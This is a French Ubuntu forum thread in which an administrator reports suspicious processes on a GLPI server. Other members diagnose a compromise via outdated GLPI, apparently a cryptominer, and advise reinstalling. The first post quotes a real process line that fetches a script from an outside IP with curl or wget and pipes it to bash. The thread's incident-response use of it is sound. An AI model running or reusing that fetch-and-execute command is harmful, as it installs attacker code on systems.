Comment trouver d'ou se lancent ces process

Jazza · Le 24/08/2023, à 16:13

Bonjour,

J'ai un problème avec un serveur ubuntu sur lequel est installé GLPI.
J'ai remarqué que j'avais des requêtes externe très louche dans mes process:

www-data   51904  0.0  0.0   2888  1000 ?        S    15:13   0:00 sh -c (curl -s http://103.214.112.10/linux.sh||wget -q -O- http://103.214.112.10/linux.sh)|bash
www-data   51905  0.0  0.2  11148  4364 ?        S    15:13   0:00 wget -q -O- http://103.214.112.10/linux.sh

le user www-data est mon user apache, je n'ai aucun cron sous son user et j'ai vérifié les autres et aucune trace de ces requêtes.

Est-ce qu'il y a moyen de savoir d'où cela s'exécute?

Ubuntu 22.04.3 LTS
GLPI 9.5.9

J'ai désactivé tous les plugins GLPI au cas ou mais je n'ai rien trouvé. Les mots de passe ont été changés et l'IP indiqué (qui est en indonésie) est bloquée également.

Je ne suis pas un cador en linux donc soyez indulgent

Merci pour votre aide.

PS: si c'est pas le bon forum, désolé

Dernière modification par Jazza (Le 24/08/2023, à 16:14)

bruno · Le 24/08/2023, à 16:39

Bonjour,

Ton serveur a été compromis via une application web. Il faut le réinstaller entièrement ( après avoir éventuellement fait une image disque pour une analyse post-mortem)
Je n'ai pas le temps de regarder en détail mais les processus en question tentent de télécharger et d’exécuter un script bash qui lui même tente de lancer un exécutable (probablement un mineur de crypto-monnaies) récupéré sur une autre machine compromise

Dernière modification par bruno (Le 24/08/2023, à 16:42)

Nuliel · Le 24/08/2023, à 21:58

Bonjour,
Je confirme que ta machine est compromise et qu'il faut réinstaller.
J'ai un peu analysé le malware, à première vue il s'agit effectivement d'un mineur de cryptomonnaie (XMR)
Et la confirmation de virustotal sur le binaire associé au JSON contenant l'adresse du portefeuille de l'attaquant: https://www.virustotal.com/gui/file/392 … 10531b4aab

Ta version de GLPI n'était pas à jour et il y a des vulnérabilités critiques sur cette version, qui sont visiblement activement exploitées.

Dernière modification par Nuliel (Le 24/08/2023, à 22:06)

MicP · Le 25/08/2023, à 04:35

Bonjour

D'autre part, sur la page d'accueil de GLPI
on peut voir sur la première ligne affichée le lien suivant : ⚠️ GLPI 9.5.x sera interrompu

Du côté du CERT, on peut lire dans la page 25 de leur rapport : PANORAMA DE LA CYBERMENACE 2022

…
A → L’EXPLOITATION DE VULNÉRABILITÉS
De nombreux incidents observés par et rapportés à l’ANSSI au cours de l’année 2022 ont pour origine l’exploitation de vulnérabilités disposant pourtant de correctifs mis à disposition par les éditeurs et ayant fait l’objet d’avis ou de bulletins d’alerte, toujours disponibles sur le site du CERT-FR.
Pour les plus critiques, ces publications ont été accompagnées de campagnes de signalement.
Ces vulnérabilités concernent des logiciels particulièrement courants et utilisés par de très nombreuses organisations publiques comme privées.
Certaines de ces vulnérabilités, parmi les plus exploitées, sont corrigées depuis 2021.
…

Voir aussi le bulletin d'alerte (CERTFR-2022-ALE-010) concernant GLPI

Dernière modification par MicP (Le 25/08/2023, à 04:49)

Jazza · Le 28/08/2023, à 11:39

Bonjour,
Merci pour vos retours.
C'est bien ce que j'avais peur...

En fait, on avait remarqué cela sur notre ancien serveur (c'est pourquoi l'IP est bloqué) et on voulait upgrade sur la version 10.
On a réinstallé un serveur sur la version 9.5 pour l'upgrade en 10 mais j'ai remarqué qu'on avait de nouveau des tentatives de connexion depuis le nouveau.

Est-ce qu'il est possible d'installer la version 10 directement et de récupérer l'historique de la 9.5?

Encore merci!

Watael · Le 28/08/2023, à 17:25

je ne comprends pas.
ces scripts sont bien déclenchés par un élément du serveur, non ?
alors, n'y a-t-il pas moyen de savoir lequel pour soit le supprimer, soit réécrire la partie qui les lance ?

Dernière modification par Watael (Le 28/08/2023, à 17:25)

Nuliel · Le 28/08/2023, à 19:13

@Watael: selon https://www.virustotal.com/gui/file/392 … b/behavior ce serait via systemctl que la persistance se fait. Par ailleurs on sait pas si le binaire permet au serveur de commande et contrôle (C&C) peut prendre le contrôle du serveur à distance, on sait qu'il y a l'établissement d'un canal sécurisé, pas plus. Même si la bonne commande systemctl permet de retirer la persistance, on n'est pas sûr qu'il y a un autre moyen (crontab, ...), ni qu'il y ait d'autres binaires déposés, et l'impact qu'ils ont (linpeas par exemple pour de l’élévation de privilèges). Bref dans le doute, faut réinstaller.

Il y a pas une option à l'installation pour importer une base de données? (à noter que je connais pas glpi)

Watael · Le 28/08/2023, à 20:44

c'est clair. merci.

Ubuntu-fr

Navigation

Liens de recherche

Annonce

#1 Le 24/08/2023, à 16:13

Comment trouver d'ou se lancent ces process

#2 Le 24/08/2023, à 16:39

Re : Comment trouver d'ou se lancent ces process

#3 Le 24/08/2023, à 21:58

Re : Comment trouver d'ou se lancent ces process

#4 Le 25/08/2023, à 04:35

Re : Comment trouver d'ou se lancent ces process

#5 Le 28/08/2023, à 11:39

Re : Comment trouver d'ou se lancent ces process

#6 Le 28/08/2023, à 17:25

Re : Comment trouver d'ou se lancent ces process

#7 Le 28/08/2023, à 19:13

Re : Comment trouver d'ou se lancent ces process

#8 Le 28/08/2023, à 20:44

Re : Comment trouver d'ou se lancent ces process

Pied de page des forums